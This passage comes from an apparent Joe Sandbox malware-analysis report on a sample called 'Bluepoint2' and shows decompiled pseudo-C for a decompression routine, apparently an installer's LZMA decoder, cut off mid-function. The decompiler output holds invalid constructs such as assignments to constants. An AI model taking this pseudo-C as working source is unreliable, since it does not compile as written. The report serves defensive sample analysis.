                                                                                                                                    • Associated: 00000002.00000002.84105061190.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000002.00000002.84105117723.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Bluepoint2.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                                    • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                                                                    • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                                                                    • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                    			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
